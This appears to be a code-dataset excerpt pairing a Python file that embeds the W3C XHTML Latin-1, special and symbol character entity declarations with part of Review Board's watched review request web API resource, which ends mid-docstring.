XHTML DTDs make available a standard collection of named character entities. Those entities are defined in this section.
F.1.1. XHTML Latin 1 Character Entities
You can download this version of this file from http://www.w3.org/TR/2010/REC-xhtml-modularization/DTD/xhtml-lat1.ent. The latest version is available at http://www.w3.org/MarkUp/DTD/xhtml-lat1.ent.
<!-- ...................................................................... -->
<!-- XML-compatible ISO Latin 1 Character Entity Set for XHTML ............ -->
<!-- file: xhtml-lat1.ent
Typical invocation:
<!ENTITY % xhtml-lat1
PUBLIC "-//W3C//ENTITIES Latin 1 for XHTML//EN"
"xhtml-lat1.ent" >
%xhtml-lat1;
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//ENTITIES Latin 1 for XHTML//EN"
SYSTEM "http://www.w3.org/MarkUp/DTD/xhtml-lat1.ent"
Revision: Id: xhtml-lat1.ent,v 4.1 2001/04/10 09:34:14 altheim Exp $ SMI
Portions (C) International Organization for Standardization 1986:
Permission to copy in any form is granted for use with conforming
SGML systems and applications as defined in ISO 8879, provided
this notice is included in all copies.
-->
<!ENTITY nbsp " " ><!-- no-break space = non-breaking space, U+00A0 ISOnum -->
<!ENTITY iexcl "¡" ><!-- inverted exclamation mark, U+00A1 ISOnum -->
<!ENTITY cent "¢" ><!-- cent sign, U+00A2 ISOnum -->
<!ENTITY pound "£" ><!-- pound sign, U+00A3 ISOnum -->
<!ENTITY curren "¤" ><!-- currency sign, U+00A4 ISOnum -->
<!ENTITY yen "¥" ><!-- yen sign = yuan sign, U+00A5 ISOnum -->
<!ENTITY brvbar "¦" ><!-- broken bar = broken vertical bar, U+00A6 ISOnum -->
<!ENTITY sect "§" ><!-- section sign, U+00A7 ISOnum -->
<!ENTITY uml "¨" ><!-- diaeresis = spacing diaeresis, U+00A8 ISOdia -->
<!ENTITY copy "©" ><!-- copyright sign, U+00A9 ISOnum -->
<!ENTITY ordf "ª" ><!-- feminine ordinal indicator, U+00AA ISOnum -->
<!ENTITY laquo "«" ><!-- left-pointing double angle quotation mark = left pointing guillemet, U+00AB ISOnum -->
<!ENTITY not "¬" ><!-- not sign, U+00AC ISOnum -->
<!ENTITY shy "­" ><!-- soft hyphen = discretionary hyphen, U+00AD ISOnum -->
<!ENTITY reg "®" ><!-- registered sign = registered trade mark sign, U+00AE ISOnum -->
<!ENTITY macr "¯" ><!-- macron = spacing macron = overline = APL overbar, U+00AF ISOdia -->
<!ENTITY deg "°" ><!-- degree sign, U+00B0 ISOnum -->
<!ENTITY plusmn "±" ><!-- plus-minus sign = plus-or-minus sign, U+00B1 ISOnum -->
<!ENTITY sup2 "²" ><!-- superscript two = superscript digit two = squared, U+00B2 ISOnum -->
<!ENTITY sup3 "³" ><!-- superscript three = superscript digit three = cubed, U+00B3 ISOnum -->
<!ENTITY acute "´" ><!-- acute accent = spacing acute, U+00B4 ISOdia -->
<!ENTITY micro "µ" ><!-- micro sign, U+00B5 ISOnum -->
<!ENTITY para "¶" ><!-- pilcrow sign = paragraph sign, U+00B6 ISOnum -->
<!ENTITY middot "·" ><!-- middle dot = Georgian comma = Greek middle dot, U+00B7 ISOnum -->
<!ENTITY cedil "¸" ><!-- cedilla = spacing cedilla, U+00B8 ISOdia -->
<!ENTITY sup1 "¹" ><!-- superscript one = superscript digit one, U+00B9 ISOnum -->
<!ENTITY ordm "º" ><!-- masculine ordinal indicator, U+00BA ISOnum -->
<!ENTITY raquo "»" ><!-- right-pointing double angle quotation mark = right pointing guillemet, U+00BB ISOnum -->
<!ENTITY frac14 "¼" ><!-- vulgar fraction one quarter = fraction one quarter, U+00BC ISOnum -->
<!ENTITY frac12 "½" ><!-- vulgar fraction one half = fraction one half, U+00BD ISOnum -->
<!ENTITY frac34 "¾" ><!-- vulgar fraction three quarters = fraction three quarters, U+00BE ISOnum -->
<!ENTITY iquest "¿" ><!-- inverted question mark = turned question mark, U+00BF ISOnum -->
<!ENTITY Agrave "À" ><!-- latin capital A with grave = latin capital A grave, U+00C0 ISOlat1 -->
<!ENTITY Aacute "Á" ><!-- latin capital A with acute, U+00C1 ISOlat1 -->
<!ENTITY Acirc "Â" ><!-- latin capital A with circumflex, U+00C2 ISOlat1 -->
<!ENTITY Atilde "Ã" ><!-- latin capital A with tilde, U+00C3 ISOlat1 -->
<!ENTITY Auml "Ä" ><!-- latin capital A with diaeresis, U+00C4 ISOlat1 -->
<!ENTITY Aring "Å" ><!-- latin capital A with ring above = latin capital A ring, U+00C5 ISOlat1 -->
<!ENTITY AElig "Æ" ><!-- latin capital AE = latin capital ligature AE, U+00C6 ISOlat1 -->
<!ENTITY Ccedil "Ç" ><!-- latin capital C with cedilla, U+00C7 ISOlat1 -->
<!ENTITY Egrave "È" ><!-- latin capital E with grave, U+00C8 ISOlat1 -->
<!ENTITY Eacute "É" ><!-- latin capital E with acute, U+00C9 ISOlat1 -->
<!ENTITY Ecirc "Ê" ><!-- latin capital E with circumflex, U+00CA ISOlat1 -->
<!ENTITY Euml "Ë" ><!-- latin capital E with diaeresis, U+00CB ISOlat1 -->
<!ENTITY Igrave "Ì" ><!-- latin capital I with grave, U+00CC ISOlat1 -->
<!ENTITY Iacute "Í" ><!-- latin capital I with acute, U+00CD ISOlat1 -->
<!ENTITY Icirc "Î" ><!-- latin capital I with circumflex, U+00CE ISOlat1 -->
<!ENTITY Iuml "Ï" ><!-- latin capital I with diaeresis, U+00CF ISOlat1 -->
<!ENTITY ETH "Ð" ><!-- latin capital ETH, U+00D0 ISOlat1 -->
<!ENTITY Ntilde "Ñ" ><!-- latin capital N with tilde, U+00D1 ISOlat1 -->
<!ENTITY Ograve "Ò" ><!-- latin capital O with grave, U+00D2 ISOlat1 -->
<!ENTITY Oacute "Ó" ><!-- latin capital O with acute, U+00D3 ISOlat1 -->
<!ENTITY Ocirc "Ô" ><!-- latin capital O with circumflex, U+00D4 ISOlat1 -->
<!ENTITY Otilde "Õ" ><!-- latin capital O with tilde, U+00D5 ISOlat1 -->
<!ENTITY Ouml "Ö" ><!-- latin capital O with diaeresis, U+00D6 ISOlat1 -->
<!ENTITY times "×" ><!-- multiplication sign, U+00D7 ISOnum -->
<!ENTITY Oslash "Ø" ><!-- latin capital O with stroke = latin capital O slash, U+00D8 ISOlat1 -->
<!ENTITY Ugrave "Ù" ><!-- latin capital U with grave, U+00D9 ISOlat1 -->
<!ENTITY Uacute "Ú" ><!-- latin capital U with acute, U+00DA ISOlat1 -->
<!ENTITY Ucirc "Û" ><!-- latin capital U with circumflex, U+00DB ISOlat1 -->
<!ENTITY Uuml "Ü" ><!-- latin capital U with diaeresis, U+00DC ISOlat1 -->
<!ENTITY Yacute "Ý" ><!-- latin capital Y with acute, U+00DD ISOlat1 -->
<!ENTITY THORN "Þ" ><!-- latin capital THORN, U+00DE ISOlat1 -->
<!ENTITY szlig "ß" ><!-- latin small sharp s = ess-zed, U+00DF ISOlat1 -->
<!ENTITY agrave "à" ><!-- latin small a with grave = latin small a grave, U+00E0 ISOlat1 -->
<!ENTITY aacute "á" ><!-- latin small a with acute, U+00E1 ISOlat1 -->
<!ENTITY acirc "â" ><!-- latin small a with circumflex, U+00E2 ISOlat1 -->
<!ENTITY atilde "ã" ><!-- latin small a with tilde, U+00E3 ISOlat1 -->
<!ENTITY auml "ä" ><!-- latin small a with diaeresis, U+00E4 ISOlat1 -->
<!ENTITY aring "å" ><!-- latin small a with ring above = latin small a ring, U+00E5 ISOlat1 -->
<!ENTITY aelig "æ" ><!-- latin small ae = latin small ligature ae, U+00E6 ISOlat1 -->
<!ENTITY ccedil "ç" ><!-- latin small c with cedilla, U+00E7 ISOlat1 -->
<!ENTITY egrave "è" ><!-- latin small e with grave, U+00E8 ISOlat1 -->
<!ENTITY eacute "é" ><!-- latin small e with acute, U+00E9 ISOlat1 -->
<!ENTITY ecirc "ê" ><!-- latin small e with circumflex, U+00EA ISOlat1 -->
<!ENTITY euml "ë" ><!-- latin small e with diaeresis, U+00EB ISOlat1 -->
<!ENTITY igrave "ì" ><!-- latin small i with grave, U+00EC ISOlat1 -->
<!ENTITY iacute "í" ><!-- latin small i with acute, U+00ED ISOlat1 -->
<!ENTITY icirc "î" ><!-- latin small i with circumflex, U+00EE ISOlat1 -->
<!ENTITY iuml "ï" ><!-- latin small i with diaeresis, U+00EF ISOlat1 -->
<!ENTITY eth "ð" ><!-- latin small eth, U+00F0 ISOlat1 -->
<!ENTITY ntilde "ñ" ><!-- latin small n with tilde, U+00F1 ISOlat1 -->
<!ENTITY ograve "ò" ><!-- latin small o with grave, U+00F2 ISOlat1 -->
<!ENTITY oacute "ó" ><!-- latin small o with acute, U+00F3 ISOlat1 -->
<!ENTITY ocirc "ô" ><!-- latin small o with circumflex, U+00F4 ISOlat1 -->
<!ENTITY otilde "õ" ><!-- latin small o with tilde, U+00F5 ISOlat1 -->
<!ENTITY ouml "ö" ><!-- latin small o with diaeresis, U+00F6 ISOlat1 -->
<!ENTITY divide "÷" ><!-- division sign, U+00F7 ISOnum -->
<!ENTITY oslash "ø" ><!-- latin small o with stroke, = latin small o slash, U+00F8 ISOlat1 -->
<!ENTITY ugrave "ù" ><!-- latin small u with grave, U+00F9 ISOlat1 -->
<!ENTITY uacute "ú" ><!-- latin small u with acute, U+00FA ISOlat1 -->
<!ENTITY ucirc "û" ><!-- latin small u with circumflex, U+00FB ISOlat1 -->
<!ENTITY uuml "ü" ><!-- latin small u with diaeresis, U+00FC ISOlat1 -->
<!ENTITY yacute "ý" ><!-- latin small y with acute, U+00FD ISOlat1 -->
<!ENTITY thorn "þ" ><!-- latin small thorn with, U+00FE ISOlat1 -->
<!ENTITY yuml "ÿ" ><!-- latin small y with diaeresis, U+00FF ISOlat1 -->
<!-- end of xhtml-lat1.ent -->
F.1.2. XHTML Special Characters
You can download this version of this file from http://www.w3.org/TR/2010/REC-xhtml-modularization/DTD/xhtml-special.ent. The latest version is available at http://www.w3.org/MarkUp/DTD/xhtml-special.ent.
<!-- ...................................................................... -->
<!-- XML-compatible ISO Special Character Entity Set for XHTML ............ -->
<!-- file: xhtml-special.ent
Typical invocation:
<!ENTITY % xhtml-special
PUBLIC "-//W3C//ENTITIES Special for XHTML//EN"
"xhtml-special.ent" >
%xhtml-special;
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//ENTITIES Special for XHTML//EN"
SYSTEM "http://www.w3.org/MarkUp/DTD/xhtml-special.ent"
Revision: Id: xhtml-special.ent,v 4.1 2001/04/10 09:34:14 altheim Exp $ SMI
Portions (C) International Organization for Standardization 1986:
Permission to copy in any form is granted for use with conforming
SGML systems and applications as defined in ISO 8879, provided
this notice is included in all copies.
Revisions:
2000-10-28: added ' and altered XML Predefined Entities for compatibility
-->
<!-- Relevant ISO entity set is given unless names are newly introduced.
New names (i.e., not in ISO 8879 [SGML] list) do not clash with
any existing ISO 8879 entity names. ISO 10646 [ISO10646] character
numbers are given for each character, in hex. Entity values are
decimal conversions of the ISO 10646 values and refer to the
document character set. Names are Unicode [UNICODE] names.
-->
<!-- C0 Controls and Basic Latin -->
<!ENTITY lt "&#60;" ><!-- less-than sign, U+003C ISOnum -->
<!ENTITY gt ">" ><!-- greater-than sign, U+003E ISOnum -->
<!ENTITY amp "&#38;" ><!-- ampersand, U+0026 ISOnum -->
<!ENTITY apos "'" ><!-- The Apostrophe (Apostrophe Quote, APL Quote), U+0027 ISOnum -->
<!ENTITY quot """ ><!-- quotation mark (Quote Double), U+0022 ISOnum -->
<!-- Latin Extended-A -->
<!ENTITY OElig "Œ" ><!-- latin capital ligature OE, U+0152 ISOlat2 -->
<!ENTITY oelig "œ" ><!-- latin small ligature oe, U+0153 ISOlat2 -->
<!-- ligature is a misnomer, this is a separate character in some languages -->
<!ENTITY Scaron "Š" ><!-- latin capital letter S with caron, U+0160 ISOlat2 -->
<!ENTITY scaron "š" ><!-- latin small letter s with caron, U+0161 ISOlat2 -->
<!ENTITY Yuml "Ÿ" ><!-- latin capital letter Y with diaeresis, U+0178 ISOlat2 -->
<!-- Spacing Modifier Letters -->
<!ENTITY circ "ˆ" ><!-- modifier letter circumflex accent, U+02C6 ISOpub -->
<!ENTITY tilde "˜" ><!-- small tilde, U+02DC ISOdia -->
<!-- General Punctuation -->
<!ENTITY ensp " " ><!-- en space, U+2002 ISOpub -->
<!ENTITY emsp " " ><!-- em space, U+2003 ISOpub -->
<!ENTITY thinsp " " ><!-- thin space, U+2009 ISOpub -->
<!ENTITY zwnj "‌" ><!-- zero width non-joiner, U+200C NEW RFC 2070 -->
<!ENTITY zwj "‍" ><!-- zero width joiner, U+200D NEW RFC 2070 -->
<!ENTITY lrm "‎" ><!-- left-to-right mark, U+200E NEW RFC 2070 -->
<!ENTITY rlm "‏" ><!-- right-to-left mark, U+200F NEW RFC 2070 -->
<!ENTITY ndash "–" ><!-- en dash, U+2013 ISOpub -->
<!ENTITY mdash "—" ><!-- em dash, U+2014 ISOpub -->
<!ENTITY lsquo "‘" ><!-- left single quotation mark, U+2018 ISOnum -->
<!ENTITY rsquo "’" ><!-- right single quotation mark, U+2019 ISOnum -->
<!ENTITY sbquo "‚" ><!-- single low-9 quotation mark, U+201A NEW -->
<!ENTITY ldquo "“" ><!-- left double quotation mark, U+201C ISOnum -->
<!ENTITY rdquo "”" ><!-- right double quotation mark, U+201D ISOnum -->
<!ENTITY bdquo "„" ><!-- double low-9 quotation mark, U+201E NEW -->
<!ENTITY dagger "†" ><!-- dagger, U+2020 ISOpub -->
<!ENTITY Dagger "‡" ><!-- double dagger, U+2021 ISOpub -->
<!ENTITY permil "‰" ><!-- per mille sign, U+2030 ISOtech -->
<!-- lsaquo is proposed but not yet ISO standardized -->
<!ENTITY lsaquo "‹" ><!-- single left-pointing angle quotation mark, U+2039 ISO proposed -->
<!-- rsaquo is proposed but not yet ISO standardized -->
<!ENTITY rsaquo "›" ><!-- single right-pointing angle quotation mark, U+203A ISO proposed -->
<!ENTITY euro "€" ><!-- euro sign, U+20AC NEW -->
<!-- end of xhtml-special.ent -->
F.1.3. XHTML Mathematical, Greek, and Symbolic Characters
You can download this version of this file from http://www.w3.org/TR/2010/REC-xhtml-modularization/DTD/xhtml-symbol.ent. The latest version is available at http://www.w3.org/MarkUp/DTD/xhtml-symbol.ent.
<!-- ...................................................................... -->
<!-- ISO Math, Greek and Symbolic Character Entity Set for XHTML .......... -->
<!-- file: xhtml-symbol.ent
Typical invocation:
<!ENTITY % xhtml-symbol
PUBLIC "-//W3C//ENTITIES Symbols for XHTML//EN"
"xhtml-symbol.ent" >
%xhtml-symbol;
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//ENTITIES Symbols for XHTML//EN"
SYSTEM "http://www.w3.org/MarkUp/DTD/xhtml-symbol.ent"
Revision: Id: xhtml-symbol.ent,v 4.1 2001/04/10 09:34:14 altheim Exp $ SMI
Portions (C) International Organization for Standardization 1986:
Permission to copy in any form is granted for use with conforming
SGML systems and applications as defined in ISO 8879, provided
this notice is included in all copies.
-->
<!-- Relevant ISO entity set is given unless names are newly introduced.
New names (i.e., not in ISO 8879 [SGML] list) do not clash with
any existing ISO 8879 entity names. ISO 10646 [ISO10646] character
numbers are given for each character, in hex. Entity values are
decimal conversions of the ISO 10646 values and refer to the
document character set. Names are Unicode [UNICODE] names.
-->
<!-- Latin Extended-B -->
<!ENTITY fnof "ƒ" ><!-- latin small f with hook = function
= florin, U+0192 ISOtech -->
<!-- Greek -->
<!ENTITY Alpha "Α" ><!-- greek capital letter alpha, U+0391 -->
<!ENTITY Beta "Β" ><!-- greek capital letter beta, U+0392 -->
<!ENTITY Gamma "Γ" ><!-- greek capital letter gamma, U+0393 ISOgrk3 -->
<!ENTITY Delta "Δ" ><!-- greek capital letter delta, U+0394 ISOgrk3 -->
<!ENTITY Epsilon "Ε" ><!-- greek capital letter epsilon, U+0395 -->
<!ENTITY Zeta "Ζ" ><!-- greek capital letter zeta, U+0396 -->
<!ENTITY Eta "Η" ><!-- greek capital letter eta, U+0397 -->
<!ENTITY Theta "Θ" ><!-- greek capital letter theta, U+0398 ISOgrk3 -->
<!ENTITY Iota "Ι" ><!-- greek capital letter iota, U+0399 -->
<!ENTITY Kappa "Κ" ><!-- greek capital letter kappa, U+039A -->
<!ENTITY Lambda "Λ" ><!-- greek capital letter lambda, U+039B ISOgrk3 -->
<!ENTITY Mu "Μ" ><!-- greek capital letter mu, U+039C -->
<!ENTITY Nu "Ν" ><!-- greek capital letter nu, U+039D -->
<!ENTITY Xi "Ξ" ><!-- greek capital letter xi, U+039E ISOgrk3 -->
<!ENTITY Omicron "Ο" ><!-- greek capital letter omicron, U+039F -->
<!ENTITY Pi "Π" ><!-- greek capital letter pi, U+03A0 ISOgrk3 -->
<!ENTITY Rho "Ρ" ><!-- greek capital letter rho, U+03A1 -->
<!-- there is no Sigmaf, and no U+03A2 character either -->
<!ENTITY Sigma "Σ" ><!-- greek capital letter sigma, U+03A3 ISOgrk3 -->
<!ENTITY Tau "Τ" ><!-- greek capital letter tau, U+03A4 -->
<!ENTITY Upsilon "Υ" ><!-- greek capital letter upsilon,
U+03A5 ISOgrk3 -->
<!ENTITY Phi "Φ" ><!-- greek capital letter phi, U+03A6 ISOgrk3 -->
<!ENTITY Chi "Χ" ><!-- greek capital letter chi, U+03A7 -->
<!ENTITY Psi "Ψ" ><!-- greek capital letter psi, U+03A8 ISOgrk3 -->
<!ENTITY Omega "Ω" ><!-- greek capital letter omega, U+03A9 ISOgrk3 -->
<!ENTITY alpha "α" ><!-- greek small letter alpha, U+03B1 ISOgrk3 -->
<!ENTITY beta "β" ><!-- greek small letter beta, U+03B2 ISOgrk3 -->
<!ENTITY gamma "γ" ><!-- greek small letter gamma, U+03B3 ISOgrk3 -->
<!ENTITY delta "δ" ><!-- greek small letter delta, U+03B4 ISOgrk3 -->
<!ENTITY epsilon "ε" ><!-- greek small letter epsilon, U+03B5 ISOgrk3 -->
<!ENTITY zeta "ζ" ><!-- greek small letter zeta, U+03B6 ISOgrk3 -->
<!ENTITY eta "η" ><!-- greek small letter eta, U+03B7 ISOgrk3 -->
<!ENTITY theta "θ" ><!-- greek small letter theta, U+03B8 ISOgrk3 -->
<!ENTITY iota "ι" ><!-- greek small letter iota, U+03B9 ISOgrk3 -->
<!ENTITY kappa "κ" ><!-- greek small letter kappa, U+03BA ISOgrk3 -->
<!ENTITY lambda "λ" ><!-- greek small letter lambda, U+03BB ISOgrk3 -->
<!ENTITY mu "μ" ><!-- greek small letter mu, U+03BC ISOgrk3 -->
<!ENTITY nu "ν" ><!-- greek small letter nu, U+03BD ISOgrk3 -->
<!ENTITY xi "ξ" ><!-- greek small letter xi, U+03BE ISOgrk3 -->
<!ENTITY omicron "ο" ><!-- greek small letter omicron, U+03BF NEW -->
<!ENTITY pi "π" ><!-- greek small letter pi, U+03C0 ISOgrk3 -->
<!ENTITY rho "ρ" ><!-- greek small letter rho, U+03C1 ISOgrk3 -->
<!ENTITY sigmaf "ς" ><!-- greek small letter final sigma, U+03C2 ISOgrk3 -->
<!ENTITY sigma "σ" ><!-- greek small letter sigma, U+03C3 ISOgrk3 -->
<!ENTITY tau "τ" ><!-- greek small letter tau, U+03C4 ISOgrk3 -->
<!ENTITY upsilon "υ" ><!-- greek small letter upsilon, U+03C5 ISOgrk3 -->
<!ENTITY phi "φ" ><!-- greek small letter phi, U+03C6 ISOgrk3 -->
<!ENTITY chi "χ" ><!-- greek small letter chi, U+03C7 ISOgrk3 -->
<!ENTITY psi "ψ" ><!-- greek small letter psi, U+03C8 ISOgrk3 -->
<!ENTITY omega "ω" ><!-- greek small letter omega, U+03C9 ISOgrk3 -->
<!ENTITY thetasym "ϑ" ><!-- greek small letter theta symbol, U+03D1 NEW -->
<!ENTITY upsih "ϒ" ><!-- greek upsilon with hook symbol, U+03D2 NEW -->
<!ENTITY piv "ϖ" ><!-- greek pi symbol, U+03D6 ISOgrk3 -->
<!-- General Punctuation -->
<!ENTITY bull "•" ><!-- bullet = black small circle, U+2022 ISOpub -->
<!-- bullet is NOT the same as bullet operator, U+2219 -->
<!ENTITY hellip "…" ><!-- horizontal ellipsis = three dot leader, U+2026 ISOpub -->
<!ENTITY prime "′" ><!-- prime = minutes = feet, U+2032 ISOtech -->
<!ENTITY Prime "″" ><!-- double prime = seconds = inches, U+2033 ISOtech -->
<!ENTITY oline "‾" ><!-- overline = spacing overscore, U+203E NEW -->
<!ENTITY frasl "⁄" ><!-- fraction slash, U+2044 NEW -->
<!-- Letterlike Symbols -->
<!ENTITY weierp "℘" ><!-- script capital P = power set = Weierstrass p, U+2118 ISOamso -->
<!ENTITY image "ℑ" ><!-- blackletter capital I = imaginary part, U+2111 ISOamso -->
<!ENTITY real "ℜ" ><!-- blackletter capital R = real part symbol, U+211C ISOamso -->
<!ENTITY trade "™" ><!-- trade mark sign, U+2122 ISOnum -->
<!ENTITY alefsym "ℵ" ><!-- alef symbol = first transfinite cardinal, U+2135 NEW -->
<!-- alef symbol is NOT the same as hebrew letter alef, U+05D0 although
the same glyph could be used to depict both characters -->
<!-- Arrows -->
<!ENTITY larr "←" ><!-- leftwards arrow, U+2190 ISOnum -->
<!ENTITY uarr "↑" ><!-- upwards arrow, U+2191 ISOnum-->
<!ENTITY rarr "→" ><!-- rightwards arrow, U+2192 ISOnum -->
<!ENTITY darr "↓" ><!-- downwards arrow, U+2193 ISOnum -->
<!ENTITY harr "↔" ><!-- left right arrow, U+2194 ISOamsa -->
<!ENTITY crarr "↵" ><!-- downwards arrow with corner leftwards
= carriage return, U+21B5 NEW -->
<!ENTITY lArr "⇐" ><!-- leftwards double arrow, U+21D0 ISOtech -->
<!-- Unicode does not say that lArr is the same as the 'is implied by' arrow
but also does not have any other character for that function. So ? lArr can
be used for 'is implied by' as ISOtech suggests -->
<!ENTITY uArr "⇑" ><!-- upwards double arrow, U+21D1 ISOamsa -->
<!ENTITY rArr "⇒" ><!-- rightwards double arrow, U+21D2 ISOtech -->
<!-- Unicode does not say this is the 'implies' character but does not have
another character with this function so ?
rArr can be used for 'implies' as ISOtech suggests -->
<!ENTITY dArr "⇓" ><!-- downwards double arrow, U+21D3 ISOamsa -->
<!ENTITY hArr "⇔" ><!-- left right double arrow, U+21D4 ISOamsa -->
<!-- Mathematical Operators -->
<!ENTITY forall "∀" ><!-- for all, U+2200 ISOtech -->
<!ENTITY part "∂" ><!-- partial differential, U+2202 ISOtech -->
<!ENTITY exist "∃" ><!-- there exists, U+2203 ISOtech -->
<!ENTITY empty "∅" ><!-- empty set = null set, U+2205 ISOamso -->
<!ENTITY nabla "∇" ><!-- nabla = backward difference, U+2207 ISOtech -->
<!ENTITY isin "∈" ><!-- element of, U+2208 ISOtech -->
<!ENTITY notin "∉" ><!-- not an element of, U+2209 ISOtech -->
<!ENTITY ni "∋" ><!-- contains as member, U+220B ISOtech -->
<!-- should there be a more memorable name than 'ni'? -->
<!ENTITY prod "∏" ><!-- n-ary product = product sign, U+220F ISOamsb -->
<!-- prod is NOT the same character as U+03A0 'greek capital letter pi' though
the same glyph might be used for both -->
<!ENTITY sum "∑" ><!-- n-ary sumation, U+2211 ISOamsb -->
<!-- sum is NOT the same character as U+03A3 'greek capital letter sigma'
though the same glyph might be used for both -->
<!ENTITY minus "−" ><!-- minus sign, U+2212 ISOtech -->
<!ENTITY lowast "∗" ><!-- asterisk operator, U+2217 ISOtech -->
<!ENTITY radic "√" ><!-- square root = radical sign, U+221A ISOtech -->
<!ENTITY prop "∝" ><!-- proportional to, U+221D ISOtech -->
<!ENTITY infin "∞" ><!-- infinity, U+221E ISOtech -->
<!ENTITY ang "∠" ><!-- angle, U+2220 ISOamso -->
<!ENTITY and "∧" ><!-- logical and = wedge, U+2227 ISOtech -->
<!ENTITY or "∨" ><!-- logical or = vee, U+2228 ISOtech -->
<!ENTITY cap "∩" ><!-- intersection = cap, U+2229 ISOtech -->
<!ENTITY cup "∪" ><!-- union = cup, U+222A ISOtech -->
<!ENTITY int "∫" ><!-- integral, U+222B ISOtech -->
<!ENTITY there4 "∴" ><!-- therefore, U+2234 ISOtech -->
<!ENTITY sim "∼" ><!-- tilde operator = varies with = similar to, U+223C ISOtech -->
<!-- tilde operator is NOT the same character as the tilde, U+007E,
although the same glyph might be used to represent both -->
<!ENTITY cong "≅" ><!-- approximately equal to, U+2245 ISOtech -->
<!ENTITY asymp "≈" ><!-- almost equal to = asymptotic to, U+2248 ISOamsr -->
<!ENTITY ne "≠" ><!-- not equal to, U+2260 ISOtech -->
<!ENTITY equiv "≡" ><!-- identical to, U+2261 ISOtech -->
<!ENTITY le "≤" ><!-- less-than or equal to, U+2264 ISOtech -->
<!ENTITY ge "≥" ><!-- greater-than or equal to, U+2265 ISOtech -->
<!ENTITY sub "⊂" ><!-- subset of, U+2282 ISOtech -->
<!ENTITY sup "⊃" ><!-- superset of, U+2283 ISOtech -->
<!-- note that nsup, 'not a superset of, U+2283' is not covered by the Symbol
font encoding and is not included. Should it be, for symmetry?
It is in ISOamsn -->
<!ENTITY nsub "⊄" ><!-- not a subset of, U+2284 ISOamsn -->
<!ENTITY sube "⊆" ><!-- subset of or equal to, U+2286 ISOtech -->
<!ENTITY supe "⊇" ><!-- superset of or equal to, U+2287 ISOtech -->
<!ENTITY oplus "⊕" ><!-- circled plus = direct sum, U+2295 ISOamsb -->
<!ENTITY otimes "⊗" ><!-- circled times = vector product, U+2297 ISOamsb -->
<!ENTITY perp "⊥" ><!-- up tack = orthogonal to = perpendicular, U+22A5 ISOtech -->
<!ENTITY sdot "⋅" ><!-- dot operator, U+22C5 ISOamsb -->
<!-- dot operator is NOT the same character as U+00B7 middle dot -->
<!-- Miscellaneous Technical -->
<!ENTITY lceil "⌈" ><!-- left ceiling = apl upstile, U+2308 ISOamsc -->
<!ENTITY rceil "⌉" ><!-- right ceiling, U+2309 ISOamsc -->
<!ENTITY lfloor "⌊" ><!-- left floor = apl downstile, U+230A ISOamsc -->
<!ENTITY rfloor "⌋" ><!-- right floor, U+230B ISOamsc -->
<!ENTITY lang "〈" ><!-- left-pointing angle bracket = bra, U+2329 ISOtech -->
<!-- lang is NOT the same character as U+003C 'less than'
or U+2039 'single left-pointing angle quotation mark' -->
<!ENTITY rang "〉" ><!-- right-pointing angle bracket = ket, U+232A ISOtech -->
<!-- rang is NOT the same character as U+003E 'greater than'
or U+203A 'single right-pointing angle quotation mark' -->
<!-- Geometric Shapes -->
<!ENTITY loz "◊" ><!-- lozenge, U+25CA ISOpub -->
<!-- Miscellaneous Symbols -->
<!ENTITY spades "♠" ><!-- black spade suit, U+2660 ISOpub -->
<!-- black here seems to mean filled as opposed to hollow -->
<!ENTITY clubs "♣" ><!-- black club suit = shamrock, U+2663 ISOpub -->
<!ENTITY hearts "♥" ><!-- black heart suit = valentine, U+2665 ISOpub -->
<!ENTITY diams "♦" ><!-- black diamond suit, U+2666 ISOpub -->
<!-- end of xhtml-symbol.ent -->
"""
return text
def get_apache_license():
license = r"""/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
"""
return license
main()
|
6c4f125b269c723964462f1d91c9ead2290ad66c
|
88dda5e76cef286c7db3ae7e5d1a32d28f7815a3
|
/reviewboard/webapi/resources/watched_review_request.py
|
fc16eee201c3490e555dd9ffb789e0ff2e7e134c
|
[
"MIT"
] |
permissive
|
reviewboard/reviewboard
|
f4d3bada08ba9d6ef53add2d1fdb82bd6cc63a1e
|
c3a991f1e9d7682239a1ab0e8661cee6da01d537
|
refs/heads/master
| 2023-08-31T09:03:14.170335
| 2023-08-30T08:22:43
| 2023-08-30T08:22:43
| 285,304
| 1,141
| 353
|
MIT
| 2023-06-07T16:51:02
| 2009-08-22T21:39:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,491
|
py
|
watched_review_request.py
|
from djblets.util.decorators import augment_method_from
from reviewboard.webapi.decorators import webapi_check_local_site
from reviewboard.webapi.resources import resources
from reviewboard.webapi.resources.base_watched_object import \
BaseWatchedObjectResource
class WatchedReviewRequestResource(BaseWatchedObjectResource):
"""Lists and manipulates entries for review requests watched by the user.
These are requests that the user has starred in their Dashboard.
This resource can be used for listing existing review requests and adding
new review requests to watch.
Each item in the resource is an association between the user and the
review request. The entries in the list are not the review requests
themselves, but rather an entry that represents this association by
listing the association's ID (which can be used for removing the
association) and linking to the review request.
"""
name = 'watched_review_request'
uri_name = 'review-requests'
profile_field = 'starred_review_requests'
star_function = 'star_review_request'
unstar_function = 'unstar_review_request'
@property
def watched_resource(self):
"""Return the watched resource.
This is implemented as a property in order to work around
a circular reference issue.
"""
return resources.review_request
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def get(self, *args, **kwargs):
"""Redirects to the review request being watched.
Rather than returning a body with the entry, performing an HTTP GET
on this resource will redirect the client to the actual review request
being watched.
Clients must properly handle :http:`302` and expect this redirect
to happen.
"""
pass
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def get_list(self, *args, **kwargs):
"""Retrieves the list of watched review requests.
Each entry in the list consists of a numeric ID that represents the
entry for the watched review request. This is not necessarily the ID
of the review request itself. It's used for looking up the resource
of the watched item so that it can be removed.
"""
pass
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def create(self, *args, **kwargs):
"""Marks a review request as being watched.
